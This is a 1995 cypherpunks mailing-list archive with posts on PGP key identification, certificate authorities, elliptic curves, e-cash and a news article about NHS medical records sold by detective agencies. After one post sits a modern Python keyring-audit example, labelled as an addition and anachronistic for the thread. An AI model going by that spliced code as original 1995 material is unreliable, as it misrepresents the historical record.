issue to be edited by Rolf Wigand, Syracuse University. The paper
submission deadline is January 15, 1996.

Electronic transactions are now commonplace in the business and
government environment in the industrialized world.  In the United States
alone, over 50 % of all companies are exchanging data electronically while
engaging in accounting, controlling, production management, funds
transfer, record-keeping, purchasing and selling activities.  Consumers
too use various information technologies daily to buy products via their
credit cards, to transfer funds, to buy stocks, and to browse through
electronic catalogues. We are entering a new era in electronic commerce
characterized by firms and customers conducting business on the Internet
spontaneously, on a 24-hour basis and worldwide.  With the phenomenal
growth of the Internet a unique and new electronic market place is
evolving. Various estimates (ranging from 10 million to over one billion)
have been advanced in terms of the total number of people who will be
connected to computer networks as they expand to include telephones,
televisions, computers, as well as a range of intelligent devices such as
the 'market choice box'.

Electronic commerce is expected to grow in various forms such as
electronic data interchange and various multimedia services such as
interactive television and home shopping, multimedia kiosks and
cable-based video-on-demand services. Off-shoots may be desk-top
video-conferencing and computer networks affecting the way we communicate
and the overall need to travel.

When overlaying and projecting many of these and future electronic
commerce activities on the envisioned National and Global Information
Highway, it is indeed astonishing to fathom the future potential for
commerce and economic performance.  At the same time, however, we can
recognize potential social, organizational and societal limits and
dysfunctions. How is the availability and use of the Internet changing
commerce as we know it? Given many uncertainties, how can we reliably and
empirically estimate the number of potential electronic commerce users on
the Internet (in an effort to separate grounded analysis and projections from
hype)? Will electronic markets provide new areas of opportunity for
retailers, producers and consumers?  How will future traffic on the
Information Highway affect each segment of an industry value chain?  How
will such foreseeable developments impact the consumer and society in
general? If electronic markets lower transaction costs for producers and
retailers, will consumers gain by accessing manufacturers directly via
market makers? What do electronic commerce developments mean from a
marketing perspective and for customer relationships? What are the impacts
of the emergence of widespread information technology use and worldwide
electronic networks (e. g., the World Wide Web) on electronic commerce and
markets in general?  Can we envision electronic forms for payment such as
digital cash on the Internet?  What may be the potential impact of
electronic cash on the economy, banks, and nations' equivalent of federal
reserve systems? What is the role of government in electronic commerce
developments and what policy directions ought to be addressed?

This special issue intends to embrace a wide and rich array of electronic
commerce issues.  We would like to focus on "commerce," not just
transactions, implying that commerce denotes a larger process including
aspects of information seeking and distribution, negotiation, trust,
risk-taking, customer relationships, buyers finding sellers, sellers finding
customers, after-sale service and support. Although we are interested in
transaction processing concerns within and between firms and within
markets, we would also like to address important and essential social and
behavioral issues in this setting, without which no effective commerce is
possible. Moreover, we are interested in work and organizational issues
embedded in electronic commerce and what they mean and imply inside the
organization.  In addition, we would like to explore how these electronic
commerce issues relate to the marketing perspective, such as in
relationships between firms and customers/clients.

_The Information Society_ journal, published since 1981, is a key forum
for thoughtful analysis of the impacts, policies, system concepts,
methodologies and cultural change related to trends that may be described
as the "information technology revolution."  It is a refereed journal
publishing scholarly articles, position papers, short communications and
book reviews.

_The Information Society_ is a multidisciplinary journal whose audiences
include policy- and decision-makers and scientists in government,
industry and education; managers concerned with the effects of the
information revolution on individuals, organizations and society; and
scholars with an interest in the relationship between information
technologies, social/organizational life, and social change. A general
description of the journal can be found at the following URL:
        http://www.ics.uci.edu/~kling/tis.html

For this special issue on "Electronic Commerce" and, in general, _The
Information Society_ is interested in provocative analytical articles or
empirical studies that are written to advance our understanding of the
relationships among information technology, related social practices and
policies, and social change. _TIS_ articles are typically 4,000 to 6,000
words long, and are written vividly with coherent analyses and minimal
jargon.

For manuscript format details, look at the following URL:
        http://www.ics.uci.edu/~kling/tisinst.html
You may also contact the editor or see the inside back cover of an issue
of the journal. Authors of manuscripts for this issue on "Electronic
Commerce" should send four copies to the guest editor no later than
January 15, 1996:

        Rolf T. Wigand, Ph. D.
        Guest Editor, _TIS_
        School of Information Studies
        4-293 Center for Science and Technology
        Syracuse University
        Syracuse, NY 13244-4100, USA
        Telephone: +315-443-5608;  Fax: +315-443-5806
        E-Mail: rwigand@syr.edu

--- end forwarded text


-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA (617) 958-3971
"Reality is not optional." --Thomas Sowell
The e$ Home Page: http://www.webstuff.apple.com/~vinnie/Rah
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Mon, 27 Nov 1995 04:46:34 +0800
To: cypherpunks@toad.com
Subject: Re: Cypherpunk Certification Authority
Message-ID: <v02120d05acde7ef59f48@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


>Is this another one of those LD tentacles? ;)

Must be that or a spoof of some kind... "She" didn't sign it, and "she" claims
to have issued a signature...

Cheers,
Bob Hettinga

-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA (617) 958-3971
"Reality is not optional." --Thomas Sowell
The e$ Home Page: http://www.webstuff.apple.com/~vinnie/Rah
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Rev. Mark Grant" <mark@unicorn.com>
Date: Sun, 26 Nov 1995 23:52:52 +0800
To: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Subject: [NOISE] Re: crypto for porno users
Message-ID: <Pine.3.89.9511261505.A2182-0100000@unicorn.com>
MIME-Version: 1.0
Content-Type: text/plain



On Fri, 24 Nov 1995, E. ALLEN SMITH wrote:

> consent. For instance, Britain's age for consent depends on the
> type of sexuality involved; heterosexual sex receives a more
> lenient age (18) than homosexual (21).

This is getting distinctly off-topic, but Britain's age of consent is
actually 16 for heterosexual sex, 18 for male homosexuals (unless the
government have changed it back again, they reduced it from 21 a few
months ago), and I think 16 for lesbians. But it's all terribly
complicated, as you pointed out... 

Incidentally, the "Sun" newspaper, one of the most popular in the UK
(sells 3,000,000-4,000,000 copies daily, AFAIR), has often printed
half-page erotic pictures of topless sixteen-year-old girls. Would this be
"kiddie porn"  in the US ?

OBCrypto: Did anyone ever find out which version of A5 is in Applied 
Cryptography ?

	Mark





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Mon, 27 Nov 1995 05:28:06 +0800
To: cypherpunks@toad.com
Subject: Re: Cypherpunk Certification Authority
In-Reply-To: <199511262109.NAA29631@jobe.shell.portal.com>
Message-ID: <199511262120.QAA07595@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Someone spoofing Alice, who is either Detweiler or "Dr." Cohen, says:
> I have never signed any of my posts to this mailing list and frankly have
> no intention of beginning at this point.

Well, signed Alice posts have shown up, so we will just have to assume
that the above was a spoof and that the signed Alice posts are the
real ones, now won't we?

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: James Black <black@eng.usf.edu>
Date: Mon, 27 Nov 1995 06:02:32 +0800
To: anonymous-remailer@shell.portal.com
Subject: Re: Cypherpunk Certification Authority
In-Reply-To: <199511260953.BAA10105@jobe.shell.portal.com>
Message-ID: <Pine.SUN.3.91.951126164434.2346A-100000@kinks>
MIME-Version: 1.0
Content-Type: text/plain


Hello,

On Sun, 26 Nov 1995 anonymous-remailer@shell.portal.com wrote:

> > 	It's an excellent paper, well worth reading, but the basic
> > problem is that X.509 encrypts before signing.
> 
> You'd rather sign before encryption??
> 
> Doesn't that give you "known plain-text" to attack?  i.e. the signature.
> 
> I'm not sure whether it would or wouldn't, but I'm sure some
> cryptographers here might clear that up mighty quick -- before any more
> harm is allowed, I mean. 

  The paper suggested that you have two different keys, one for 
encryption and the other for signatures, and you don't mix the two up, so 
that way you are protecting yourself from someone forging your 
signature, but you are not letting them know what your private key is.
  Make sense?  I would suggest that you read the paper, as it is really 
an excellent document.

==========================================================================
James Black (Comp Sci/Comp Eng sophomore)
e-mail: black@eng.usf.edu
http://www.eng.usf.edu/~black/index.html
**************************************************************************





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Mon, 27 Nov 1995 07:35:26 +0800
To: cypherpunks@toad.com
Subject: Cyberangels
Message-ID: <01HY3X9A4V748WYKSR@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


	Some may have already seen this, but the Guardian Angels are trying to
intrude onto the net... and are doing so in typical clueless newbie fashion.
See the CUDigest web site for more information; the links to the most
significant issues are:
http://www.soci.niu.edu/~cudigest/CUDS7/cud786 and
http://www.soci.niu.edu/~cudigest/CUDS7/cud791. Some interesting commentary
is also in http://www.soci.niu.edu/~cudigest/CUDS7/cud787. Incidentally, one
way in which they are displaying cluelessness is in taking L.Detweiler
seriously.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Mon, 27 Nov 1995 12:15:05 +0800
To: cypherpunks@toad.com
Subject: Re: MED_vac
Message-ID: <199511270405.UAA04239@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 16 Nov 1995, Adam Shostack wrote:

> 	If you have some personal data that includes your patient
> number, why not have a card that instead lists your important data?
> "This patient is diabetic, allergic to amoxicillin, and has Gold Cross
> insurance." 

I'm confused.  Are you saying that the answer is hardware??  Why I think
someone already thought of that. It's called a MEDIC-ALERT bracelet. 

As someone whose blood type is rare, I can appreciate this.

> 	At Defcon, Bruce Schneier was talking about the value stored
> in casino chips.  It's staggering.  It's an alternate cash system, with
> a huge float, astounding velocity, and very little fraud.  Transaction
> costs are low, clearing is instantaneous.  The comparison is fairly
> clear.

I don't see the comparison.

High value "chips" have additional security precautions engineered into
them, over and above low-value chips, hopefully Schneier realizes this.  
There are also regular "counts", in fact perpetual "counts" in all casinos. 

I mean pit bosses and managers have to do something to earn their keep.
(other than handing out comps, I mean.)

There's also an "eye in the sky" lording over you in a casino, and the
"chips" aren't actually "cleared" until you cashout.  I'm not sure how
Schneier got the idea that it was instantaneous clearing, but it isn't by
any stretch of the imagination. 
 
But then what do I know ... I don't even sign my posts with PGP.

> |      So, what if my records were available on the net, but encrypted with a
> | key known to my physician and an escrow agency? (Equivalently, they
> | could be on that smartcard, but encrypted.) If an emergency occurs, the
> | hospital fetches my encrypted records from my physician's server, then
> | sends a message (signed with the hospital's key) to Keys R Us, the escrow
> | agent, saying "This is Dr. McCoy at Frobnitz Memorial Hospital, we need the
> | key for FooBar Medix, Inc., patient number 147258369." (My FooBar Medix,
> | Inc., insurance card lists my physician's server, the escrow agency, and my

Why bother with having records on the "Net".  What if the net goes down, 
then what??  Where are you left then?  Relying on technology, simply 
because something CAN be done is very bad practice, when it's not needed. 

When I travelled in the States, I simply kept a copy of my travel 
documents in my wallet.  I never had any problem.  And I had a copy of my 
pertinent medical data, attached via a MEDIC-ALERT bracelet to my body.

Then again, the amount of information that you want a doctor reading over
when you do have an emergency is minimal.  You really want the doctor to
act, not to get to know all of the details which aren't relevant to your
treatment. 

There's no need to overload someone, you simply have to give someone the
resources they need in order to get the job done. And that is the 
critical point, isn't it??  Getting the job done, and giving someone 
what's needed to do so.

> -- 
> "It is seldom that liberty of any kind is lost all at once."
> 					               -Hume



Alice de 'nonymous ...

                                  ...just another one of those...


P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Instituto Latinoamericano de Computacion <ilaccr@sol.racsa.co.cr>
Date: Mon, 27 Nov 1995 10:32:39 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <9511261423.AA01203@sol.racsa.co.cr>
MIME-Version: 1.0
Content-Type: text/plain


Hey, what's up, my name is Herbert Salas, I live in Costa Rica, I would like to know
everything you can about hacking. I've tried to find something here, but I
can't find anything here, how they do to encrypt things, and how can you crack
it, what do I need, software, hardware, where can I get it?? Help.
Thanks.
Herbert Salas





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Tue, 28 Nov 1995 12:44:49 +0800
To: Raph Levien <cypherpunks@toad.com
Subject: Re: The future will be easy to use
Message-ID: <199511280435.UAA08732@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 11:06 AM 11/27/95 -0800, Raph Levien wrote:
> As I see it, any system that does must have the following 
> properties:
>
>   * Some variant on the Web of Trust.
>
>   * Online key-servers for getting keys in real time.
>
>   * A clean mechanism for validating keys through alternate channels.
>
>   There are three possible outcomes: we build it, the NSA builds it, or 
> Microsoft/Netscape builds it. 

Specs, anyone?

I suggest a few requirements:

Store the keys, and information about the keys in a *real* database
(for windows apps, we can redistribute the Microsoft access and or
the paradox database engines royalty free, and drive them through 
ODBC to minimize dependency on specific vendors.)

Support tree of authentification:  A key that is *named* Peter by Sam,  
or *named* Informix Corporation by the Delaware corporate registrar, shall
be considered equivalent to any other key given the same name by same
authority, whether that authority be Dark Unicorn, or the state of
Delaware.

This last property is essential if PGP keys are to be used as a
basis for exchanging promises to pay and directives to pay.

A very common use of this feature, pending the development of
user friendly software that makes every man his own bank and his
own credit rating agency, would be as follows:  Sam generates a long
key on a clean off line computer:  He uses it to name itself Sam and to
name several shorter keys "Sam".  He then puts the private long key 
on a floppy disk and buries it in a hole in the ground along with 
his gold and his stash of SKS ammo, and most likely never uses
it again.  He publishes the long public key, and uses
the shorter private keys for actual encryption.  From time to time, 
he changes keys, without any disruption or inconvenience.


 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Wei Dai <weidai@eskimo.com>
Date: Mon, 27 Nov 1995 13:59:37 +0800
To: Norman Hardy <norm@netcom.com>
Subject: Re: Elliptic curves, current status?
In-Reply-To: <acde968205021004b44c@DialupEudora>
Message-ID: <Pine.SUN.3.91.951126213017.7378B-100000@eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 26 Nov 1995, Norman Hardy wrote:

> There are many parameters to an elliptic curve crypto system.
> I haven't seen any taxonomy of which kinds are good and which
> have been shown to be weak. In contrast there seems to be a
> consensus about how to pick primes for RSA or Diffie-Hellman.

The IEEE p1363 group's working draft on elliptic curve standard may help 
you here.  You can find it at ftp://ftp.rsa.com/pub/p1363/draft/ec.ps

One reason for confusion about the speed of elliptic curve cryptosystems is 
the small number of implementations.  A paper in Crypto 95 claimed that 
for doing key exchange, an elliptic curve algorithm takes about the same 
time and has about the same level of security as DH with 512 bit modulus, 
and that elliptic curve has a speed advantage if greater security is 
desired.

Wei Dai





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Mon, 27 Nov 1995 06:06:33 +0800
To: cypherpunks@toad.com
Subject: Re: Junk E-Mail - Part 4
Message-ID: <199511262156.WAA27898@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


Alice:

>Heavens, no.  Then again, I'm waiting for the day that the NY Times 
>allows advertising on its op-ed page.

      It does and has for years and years, every day.
      Maybe you meant the editorial page?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Tue, 28 Nov 1995 15:07:11 +0800
To: Jonathan Zamick <raph@c2.org>
Subject: Re: The future will be easy to use
Message-ID: <199511280658.WAA23722@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 01:12 PM 11/27/95 -0800, Jonathan Zamick wrote:
> it
> means forming a group, made up of Cypherpunk members perhaps, but much
> smaller, and capable of working together. Also capable of handling not only
> the theory, but good solid code, GUI, PR, meetings, talking to the
> government, etc.

Skip the talking to the government bit:  Ignore, do not confront.

 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Tue, 28 Nov 1995 15:39:47 +0800
To: James Black <jps@monad.semcor.com>
Subject: Re: The future will be easy to use
Message-ID: <199511280731.XAA11527@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 08:38 PM 11/27/95 -0500, James Black wrote:

>  As soon as PGP 3.0 is released I am planning on incorporating PGP into 
>Pine, and start putting it into more programs, to increase the usage of 
>encryption things before they go out.

Is there any public spec for PGP 3.0?

 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Tue, 28 Nov 1995 02:09:51 +0800
To: Thomas E Zerucha <norm@netcom.com>
Subject: Re: Virus attacks on PGP
Message-ID: <199511270737.XAA20199@netcom16.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:40 11/26/95 -0800, Thomas E Zerucha wrote:
>That would be interesting - even with the speaker "off" the power surge 
>causes clicking and other signs.  Not to mention that the interrupt count 
>would start moving (of course the virus could replace the entire OS and 
>would only have to find 300K chunks to hide in).

I looked at the memory usage on my 1meg Mac and 5meg is used for the
system.  I have no idea what it is all being used for.  A lot can hide
there.

Bill Frantz






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Mon, 27 Nov 1995 15:53:45 +0800
To: John Gilmore <cypherpunks@toad.com
Subject: Re: Bitbux could eliminate some domestic currencies?
Message-ID: <199511270737.XAA20225@netcom16.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:21 11/23/95 -0800, John Gilmore wrote:
>>From a letter in [My dog, I mean my software, ate this part of the msg -- gnu]
>...
>"The importance of e-money replacing cash is greater than possible effects
>on exchange rates. Rather, it might make certain currencies to all intents
>and purposes disappear."

Gresham's law says that the bad money drives the good money out of
circulation.  Does this mean that real cash is better than ecash ;-).

Bill






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cme@clark.net
Date: Mon, 27 Nov 1995 14:20:13 +0800
To: Greg_Rose@sydney.sterling.com
Subject: Re: establishing trust
Message-ID: <199511270516.AAA05126@clark.net>
MIME-Version: 1.0
Content-Type: text/plain


Greg,

>Subject: Re: establishing trust 
>Date: Mon, 27 Nov 95 12:20:47 +1000
>
>-----BEGIN PGP SIGNED MESSAGE-----

Did you intentionally not provide the same key that this was signed with?
I added the key you provided, but PGP still couldn't find the right key for
this signature.

>  from the same person.  I even know who they came from:  the person who
>  is capable of signing with key 0xXXXXXXXX.
>
>I hate to point this out, but that isn't true.
>Anyone can create a key with any chosen keyid and
>attach the same publicly known name to it.

Of course -- sloppiness on my part -- trying to minimize my own typing.
Pardon me.  One must use a hash of the key or the key itself to identify it
-- not merely some portion of the modulus -- and the ID field has to be
large enough to rule out a brute force search on the spoofer's part.


The PGP KeyID problem has merely to do with PGP's own access mechanisms.
Successful verification of a signature by some key is linkage enough to
that key.  If multiple messages/files verify by the same key, they are
linked together no matter how the key is identified.  The problem you
identified comes from the fact that PGP doesn't let us know with enough
certainty that the same key was used for two different signatures.

In fact, PGP just tells you the UserID of the key which verified the
signature -- as if that UserID were (a) unique and (b) meaningful.  The
keyID isn't displayed.

For a version of PGP to suit my tastes, the unique UserID would be assigned
by me alone -- and the file of those assignments (called "aliases" in
TIS/MOSS) would be protected under my own signature (or, equivalently,
encrypted under my own conventional key -- the same one protecting my
private keys, perhaps).

 - Carl

 +--------------------------------------------------------------------------+
 |Carl M. Ellison    cme@acm.org    http://www.clark.net/pub/cme            |
 |PGP: E0414C79B5AF36750217BC1A57386478 & 61E2DE7FCB9D7984E9C8048BA63221A2  |
 |  ``Officer, officer, arrest that man!  He's whistling a dirty song.''    |
 +---------------------------------------------- Jean Ellison (aka Mother) -+
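The keyring check Carl describes, as an added example that is not part of the original post: keys are identified by a hash of the whole public key, short key IDs and UserIDs are audited for ambiguity, and locally assigned aliases are integrity-protected. The numbers below are constructed stand-ins for RSA moduli, the 64-bit low-order key ID follows the PGP 2.x convention, and SHA-256 and an HMAC under a local secret are this example's substitutions for the key hash and for "protected under my own signature".

```python
import hashlib
import hmac
import json
from collections import defaultdict


def key_id(n):
    """Short key ID: the low 64 bits of the modulus (PGP 2.x convention)."""
    return f"{n & 0xFFFFFFFFFFFFFFFF:016X}"


def fingerprint(n, e):
    """Identify a key by a hash over the whole public key, not a slice of it."""
    def field(x):
        raw = x.to_bytes(max(1, (x.bit_length() + 7) // 8), "big")
        return len(raw).to_bytes(4, "big") + raw  # length prefix avoids ambiguity
    return hashlib.sha256(field(n) + field(e)).hexdigest()


def audit_keyring(keyring):
    """Report key IDs and UserIDs that map to more than one distinct key."""
    by_id, by_name = defaultdict(set), defaultdict(set)
    for user_id, n, e in keyring:
        fp = fingerprint(n, e)
        by_id[key_id(n)].add(fp)
        by_name[user_id].add(fp)
    return {
        "ambiguous_key_ids": sorted(k for k, v in by_id.items() if len(v) > 1),
        "ambiguous_user_ids": sorted(u for u, v in by_name.items() if len(v) > 1),
    }


def same_signer(key_a, key_b):
    """Two signatures are linked only if the full verifying keys match."""
    return fingerprint(*key_a) == fingerprint(*key_b)


def seal_aliases(aliases, local_key):
    """Serialise the locally assigned names and tag them with a local secret."""
    body = json.dumps(aliases, sort_keys=True).encode()
    return body, hmac.new(local_key, body, hashlib.sha256).hexdigest()


def open_aliases(body, tag, local_key):
    """Refuse to use an alias file that was modified after sealing."""
    expect = hmac.new(local_key, body, hashlib.sha256).hexdigest()
    if not hmac.compare_digest(expect, tag):
        raise ValueError("alias file failed its integrity check")
    return json.loads(body)


def local_alias(aliases, n, e):
    """Name shown to the user: the one assigned locally, or None if unknown."""
    return aliases.get(fingerprint(n, e))


# Constructed sample data: plain integers standing in for public keys.
LOW = 0x0123456789ABCDEF
KEY_A = ((0xA1 << 512) | LOW, 17)
KEY_B = ((0xB7 << 512) | LOW, 17)          # different key, same short key ID
KEY_C = ((0xC3 << 512) | 0xFEDCBA9876543211, 17)
KEYRING = [
    ("Alice <alice@example.org>", *KEY_A),
    ("Alice <alice@example.org>", *KEY_B),  # same UserID, different key
    ("Bob <bob@example.org>", *KEY_C),
]
LOCAL_KEY = b"constructed local secret"
ALIASES = {fingerprint(*KEY_A): "alice (key checked in person)"}

if __name__ == "__main__":
    print(audit_keyring(KEYRING))
    body, tag = seal_aliases(ALIASES, LOCAL_KEY)
    trusted = open_aliases(body, tag, LOCAL_KEY)
    for _, n, e in KEYRING:
        print(key_id(n), local_alias(trusted, n, e))
```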




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Mon, 27 Nov 1995 11:52:36 +0800
To: cypherpunks@toad.com
Subject: For sale: your secret medical records
Message-ID: <199511270120.CAA06893@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain



The Sunday Times, Top page one, 26 Nov 1995

For sale: your secret medical records for L150

by Lois Rogers and David Leppard

Confidential medical records of politicians, celebrities
and millions of other National Health Service patients
can be bought on the information black market for L150.

The contents of the files comprising patients' most
personal health details dating back 30 years, are being
sold to order by high-street detective agencies
advertising in the Yellow Pages.

The Sunday Times has discovered that GP practices across
Britain are failing to safeguard files which contain
sexual, mental and physical histories of patients. Files
on sale last week revealed how named patients had
vasectomy operations, or had a family history of
Alzheimer's disease and precancerous growths. They also
included the type and dose of medication prescribed,
visits to casualty units, and injuries suffered in road
accidents.

The disclosures have prompted calls by opposition MPs and
doctors' leaders for urgent laws to protect the security
of the health records of Britain's 56.5m patients.

Alan Milburn, a Labour health spokesman, said he would be
asking Stephen Dorrell, the health secretary, to conduct
an urgent inquiry. "This is a violation of the special
relationship between doctors and their patients," said
Milburn. "I find it disturbing and deeply sinister.
Patients will be horrified to learn that their records
can be accessed by unknown organisations."

Alex Carlile, the Liberal Democrat home affairs
spokesman and a lay member of the General Medical
Council, said: "It is ethically and morally outrageous
that organisations of any kind should obtain details like
that without consent. It is contrary to everything we are
told about the confidentiality of medical records. This
should be a crime punishable by imprisonment."

Milburn and Carlile were among more than a dozen people
who last week allowed The Sunday Times to expose the
security failures in the NHS records system by giving the
newspaper permission to access their confidential files
through commercial agencies.

The problem first came to light when one agency said it
was receiving more and more commissions from big
employers who wanted it to carry discreet checks on the
medical backgrounds of their employees. The agencies,
many of which advertise "private searches" in the Yellow
Pages, offer their services for fees ranging from L150 to
L800.

They offer to provide a written summary of anybody's
complete medical files within three hours. All they
require is the name, address and date of birth of the
patient they are investigating. They are thought to be
able to obtain the records by impersonating medical staff
and persuading them to disclose contents of the NHS files
over the telephone.

Last week a Sunday Times reporter posing as a prospective
client contacted 10 private detective agencies chosen at
random from the Yellow Pages. "Most of this stuff is on
manual records," said one employee of a London agency.
"It is pretty well protected. We're not officially
allowed [to do this] but it's perfectly possible." A
second private investigator said: "It's just a question
of knowing who and what to ask."

However, most declined to discuss the methods they used.
"What we are doing is illegal, and I'm not going into the
details over the telephone," said another agent in
Robertsbridge, East Sussex.

Dr Sandy Macara, chairman of the British Medical
Association council, which represents 105,000 doctors,
was among those who agreed to take part in the exercise.
Details of his medical and surgical history were provided
after a brief telephone call by a reporter to a private
agency. The information was faxed to the newspaper within
three hours, after a price of L150 was quoted. "This is
incredible. I cannot imagine how they have got this
information," Macara said.

The ease with which the health files could be obtained
posed a threat to the Electronic Patients' Records, a new
computer database which will soon contain the files of
all NHS patients in England and Wales, Macara said. "We
will have to ensure the new nationwide computer network
is as secure as humanly possible, and press for a
statutory right to confidentiality of patient
information."

Elizabeth France, the data protection registrar, said the
Criminal Justice Act had recently tightened the law
regarding information obtained by deception. But the
penalties apply only to information held on computer,
rather than medical notes, which at present are held
mainly on hand-written files. "This is something we take
very seriously," France said. "We are actively pursuing
it. It doesn't mean the problems have been solved."

John Wadham, director of Liberty, the civil rights group,
called on the government to introduce a new criminal
offence of obtaining information by deception. "Such
information can obviously include material about sexually
transmitted diseases and material about an individual's
physical and mental health," he said. "There clearly
needs to be a right to privacy so the courts can act
against this."

Baroness Cumberlege, the junior health minister, said
confidentiality remained a cornerstone of the NHS. "We
are about to issue strengthened guidelines for security
of records within hospitals and new measures for
unauthorised access from external sources," she said. "We
are having discussions with the BMA and the Data
Protection Agency specifically about these issues."

-----












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Mon, 27 Nov 1995 19:20:22 +0800
To: cypherpunks@toad.com
Subject: Re: Cypherpunk Certification Authority
In-Reply-To: <Pine.SUN.3.91.951125141719.4185B-100000@dfw.net>
Message-ID: <30B99C34.2A1F@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Alex Strasheim wrote:
> 
> > Basically when the browser finds a new CA that it does know about it prompts
> > the user and through a series of dialog boxes the user chooses to trust it
> > or not.
> 
> Is anyone running an ssl web server that would let us see how this works?

  A little bird pointed me toward https://www.secret.org.  I have no
idea who they are...

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: carolann@censored.org (Censored Girls Anonymous)
Date: Mon, 27 Nov 1995 18:22:37 +0800
To: cypherpunks@toad.com
Subject: Re: spooky URL
Message-ID: <199511271012.DAA03786@mailhost1.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


Nothing spooky about it.
They are an audit service for web pages that is sponsored.
Anytime you access a page this tells them you were accessed.

Love Always,

Carol Anne
ps. you can get an acct. there if you want it.

>
>while visiting  http://www.mcs.com/~candyman/http/boom.html, I noticed that
>my Netscape's status line mentions an attempt to connect to:
>
>g1.internet-audit.com
>
>a little spooky... any ideas what is happening??
>
>
>I prefer e-mail. 
>reply (anonymously)     to an197098@anon.penet.fi
>reply (NON-anonymously) to na197098@anon.penet.fi
>
>
>
>
>
>
>
>
>--****ATTENTION****--****ATTENTION****--****ATTENTION****--***ATTENTION***
>Your e-mail reply to this message WILL be *automatically* ANONYMIZED.
>Please, report inappropriate use to                abuse@anon.penet.fi
>For information (incl. non-anon reply) write to    help@anon.penet.fi
>If you have any problems, address them to          admin@anon.penet.fi
>
>
--

Member Internet Society  - Certified BETSI Programmer  -  Webmistress
***********************************************************************
Carol Anne Braddock (cab8)  carolann@censored.org   206.42.112.96
My Homepage
The Cyberdoc
***********************************************************************
------------------ PGP.ZIP Part [017/713] -------------------
M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M
MF=O0H+*%(-S%&>S%+FS&<LS%3(Q&#W1"<]2%`H^;,]^1C$'HBN8PX$4SYAU^
MPGD<Q0ZLA0D+,`MCT!LA**4M[-JPAK9F?40!AJ,CW"'%DR#:'9?Q)3[%<DQ`
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Mon, 27 Nov 1995 22:29:17 +0800
To: cypherpunks@toad.com
Subject: Re: Register
Message-ID: <199511271420.GAA26643@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


On  8 Mar 95 at 22:46, Robert East wrote:

> Register
> 
> I'd like to sign up for email
> 
> Bob


You got it, Bub!  Er, Bob.









